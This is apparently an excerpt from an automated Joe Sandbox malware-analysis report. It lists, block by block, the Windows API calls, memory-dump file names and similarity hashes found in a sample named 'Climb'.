                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                          • Opcode ID: 1fadb5c830efafdb9758857c09b22d951f7d27e0601ed00baea1870cdd9c5cf0
                                                                                                                                                                          • Instruction ID: 154221a0bc6a9f5fbdcb2bb88a5468ac8e1d301e87087275150c33c89f57b444
                                                                                                                                                                          • Opcode Fuzzy Hash: 1fadb5c830efafdb9758857c09b22d951f7d27e0601ed00baea1870cdd9c5cf0
                                                                                                                                                                          • Instruction Fuzzy Hash: EB41D876E00218ABCF10EF68C885AAEBBB5BF44F14F148295E8146B392D771DF05CB91
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00AE3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00AE3AD7
                                                                                                                                                                            • Part of subcall function 00AE3AAB: _wcslen.LIBCMT ref: 00AE3AF8
                                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00AE1B6F
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00AE1B7E
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00AE1C26
                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 00AE1C56
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2675159561-0
                                                                                                                                                                          • Opcode ID: 292652d528424b1e06e7e7da60a4ddc3d76cb257c043b6d95a5215bd36079adc
                                                                                                                                                                          • Instruction ID: 9788846ce4ed8078e8c2d462b714d91e31931f572a28fa8e9f5b274c91dbb09d
                                                                                                                                                                          • Opcode Fuzzy Hash: 292652d528424b1e06e7e7da60a4ddc3d76cb257c043b6d95a5215bd36079adc
                                                                                                                                                                          • Instruction Fuzzy Hash: 86411531600114AFDB10DFA5C984BBABBFAEF84364F148059F8559B292D770ED81CBE1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00ACE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ACD7CD,?), ref: 00ACE714
                                                                                                                                                                            • Part of subcall function 00ACE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ACD7CD,?), ref: 00ACE72D
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00ACD7F0
                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00ACD82A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00ACD8B0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00ACD8C6
                                                                                                                                                                          • SHFileOperationW.SHELL32(?), ref: 00ACD90C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                          • API String ID: 3164238972-1173974218
                                                                                                                                                                          • Opcode ID: c98e6dc4772c92627db01b638230097cc728a1c74f25d9300fb146bf7464ca86
                                                                                                                                                                          • Instruction ID: a8cb046ccd9338a1af3f7d4ebb313fe841bdc0c117ea5c4b5b187b367c36139b
                                                                                                                                                                          • Opcode Fuzzy Hash: c98e6dc4772c92627db01b638230097cc728a1c74f25d9300fb146bf7464ca86
                                                                                                                                                                          • Instruction Fuzzy Hash: 484144719052189EDF12EFA4DA85FDE77B8AF08340F1104FEA509EB141EB34A789CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AF38B8
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00AF38EB
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00AF3920
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00AF3952
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00AF397C
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00AF398D
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00AF39A7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2178440468-0
                                                                                                                                                                          • Opcode ID: 7992fbce37cc08615b3a4b1774373d581efa150b43c4174545a453f943514e5a
                                                                                                                                                                          • Instruction ID: 0472b3a88ec5f2a8432e3cfe17e70e7d854fd717c87e66dd0ae423f36cc61217
                                                                                                                                                                          • Opcode Fuzzy Hash: 7992fbce37cc08615b3a4b1774373d581efa150b43c4174545a453f943514e5a
                                                                                                                                                                          • Instruction Fuzzy Hash: 91313632604259EFDF21CF99DC98F7837A5FB86750F2412A4F6108B2B1CBB0A945DB41
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC80D0
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC80F6
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00AC80F9
                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00AC8117
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00AC8120
                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00AC8145
                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00AC8153
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                          • Opcode ID: 574efe097c7b7ce563016ea207e117f70510bb971329ba625777629cff8796ff
                                                                                                                                                                          • Instruction ID: 37818b87d5607c0c17d07c7c6b461873fe3526f8c210718f860bfa736472fdf5
                                                                                                                                                                          • Opcode Fuzzy Hash: 574efe097c7b7ce563016ea207e117f70510bb971329ba625777629cff8796ff
                                                                                                                                                                          • Instruction Fuzzy Hash: AB217F72600219AF9F10EBE8CC88DBA77EDFF09360B058529F905DB290DB74AD46C760
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC81A9
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AC81CF
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00AC81D2
                                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 00AC81F3
                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 00AC81FC
                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00AC8216
                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00AC8224
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                          • Opcode ID: 8696412c15af59033c756b4240b49ee13e794a262cc1d6556efb10a12d2c5feb
                                                                                                                                                                          • Instruction ID: 02a12cb11cc560533a7c8dfafe1f9837d46da41fa506c115275feb2836b7dceb
                                                                                                                                                                          • Opcode Fuzzy Hash: 8696412c15af59033c756b4240b49ee13e794a262cc1d6556efb10a12d2c5feb
                                                                                                                                                                          • Instruction Fuzzy Hash: 87214475604604BF9B11EBE8DC89DBAB7EDFB09360B058129F915CB2A0DB74EC42C764
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00AD0E99
                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AD0ED5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                          • String ID: nul
                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                          • Opcode ID: 13b823d12927554da8d8ed0b0f329dd1f9922bf797eb88d5b956bf35d12e1bd0
                                                                                                                                                                          • Instruction ID: 018ff698f3f7fb5f2680b9428d8b81d2686d54ae33c62f6359987aef17932119
                                                                                                                                                                          • Opcode Fuzzy Hash: 13b823d12927554da8d8ed0b0f329dd1f9922bf797eb88d5b956bf35d12e1bd0
                                                                                                                                                                          • Instruction Fuzzy Hash: 83215C7050030AAFDB208F64D805F9A7BA9BF59720F304A5AFCA6E72D0DB70D941DB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00AD0F6D
                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AD0FA8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                          • String ID: nul
                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                          • Opcode ID: b2eed29238baaabe5d522774abe296f9aacf2e596e0a795d7ac785c4c8bdf97d
                                                                                                                                                                          • Instruction ID: cdef27124329bae9164a57110ae1316e31fdb5c120bb40ca7413394ce72756f7
                                                                                                                                                                          • Opcode Fuzzy Hash: b2eed29238baaabe5d522774abe296f9aacf2e596e0a795d7ac785c4c8bdf97d
                                                                                                                                                                          • Instruction Fuzzy Hash: 64215E71600345ABDB309FA89C04E9A77E9BF59724F300A1AF8A2E73D0D7709981DB50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A67873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A678B1
                                                                                                                                                                            • Part of subcall function 00A67873: GetStockObject.GDI32(00000011), ref: 00A678C5
                                                                                                                                                                            • Part of subcall function 00A67873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A678CF
                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00AF4BB0
                                                                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00AF4BBD
                                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00AF4BC8
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00AF4BD7
                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00AF4BE3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                                          • Opcode ID: f016189d746fb1016614a535d6cf8107d9a3f4eadef63e792ec8579878bfd76e
                                                                                                                                                                          • Instruction ID: 9875666462caf3244c12ccd214eee303f85b4beed36f05f093f8f4e9dc3e1e07
                                                                                                                                                                          • Opcode Fuzzy Hash: f016189d746fb1016614a535d6cf8107d9a3f4eadef63e792ec8579878bfd76e
                                                                                                                                                                          • Instruction Fuzzy Hash: FD1193B115021DBEEF119FA4CC85EEB7FADEF08768F014110B708A6060CA71DC21DBA0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A9DB23: _free.LIBCMT ref: 00A9DB4C
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DBAD
                                                                                                                                                                            • Part of subcall function 00A92D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4), ref: 00A92D4E
                                                                                                                                                                            • Part of subcall function 00A92D38: GetLastError.KERNEL32(00B31DC4,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4,00B31DC4), ref: 00A92D60
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DBB8
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DBC3
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DC17
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DC22
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DC2D
                                                                                                                                                                          • _free.LIBCMT ref: 00A9DC38
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                          • Instruction ID: c3b260d7f7e63bb2bf3b3417972ded63cdf369e3de9c749255f21254ff4715b8
                                                                                                                                                                          • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                          • Instruction Fuzzy Hash: 77111C72641B04BADE30BBB0CE07FCB77DCAF24710F414C19B399AA252DA75B6448790
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ACE328
                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 00ACE32F
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ACE345
                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 00ACE34C
                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ACE390
                                                                                                                                                                          Strings
                                                                                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00ACE36D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLoadModuleString$Message
                                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                          • API String ID: 4072794657-3128320259
                                                                                                                                                                          • Opcode ID: fe31fbfe21efee26204db89185f30e7ba492f203fc6d6425009ceeaa1c6d2ffe
                                                                                                                                                                          • Instruction ID: eca07bd5b48fe370315ce1610251f32b7f2ff39c1e454d587ded6d5c2a00fd87
                                                                                                                                                                          • Opcode Fuzzy Hash: fe31fbfe21efee26204db89185f30e7ba492f203fc6d6425009ceeaa1c6d2ffe
                                                                                                                                                                          • Instruction Fuzzy Hash: 5E016DF2900208BFE752EBE49D89EFA776CDB08300F014595B70AE6041EA74AE858B75
                                                                                                                                                                          APIs
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00AD1322
                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?), ref: 00AD1334
                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 00AD1342
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00AD1350
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AD135F
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AD136F
                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 00AD1376
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3495660284-0
                                                                                                                                                                          • Opcode ID: 053640963d03e06122184d3f06f47014f046aefbb7684174c65939b762c157c8
                                                                                                                                                                          • Instruction ID: 8d2cb303f88b968aafef1faa813e8da742bb3efd184272ac2e34903b3b9a7353
                                                                                                                                                                          • Opcode Fuzzy Hash: 053640963d03e06122184d3f06f47014f046aefbb7684174c65939b762c157c8
                                                                                                                                                                          • Instruction Fuzzy Hash: EAF0EC32042612BBD7429BD4EE49BEABB3AFF04302F401121F202968A087749476DF90
                                                                                                                                                                          APIs
                                                                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AE281D
                                                                                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AE283E
                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00AE284F
                                                                                                                                                                          • htons.WSOCK32(?,?,?,?,?), ref: 00AE2938
                                                                                                                                                                          • inet_ntoa.WSOCK32(?), ref: 00AE28E9
                                                                                                                                                                            • Part of subcall function 00AC433E: _strlen.LIBCMT ref: 00AC4348
                                                                                                                                                                            • Part of subcall function 00AE3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00ADF669), ref: 00AE3C9D
                                                                                                                                                                          • _strlen.LIBCMT ref: 00AE2992
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3203458085-0
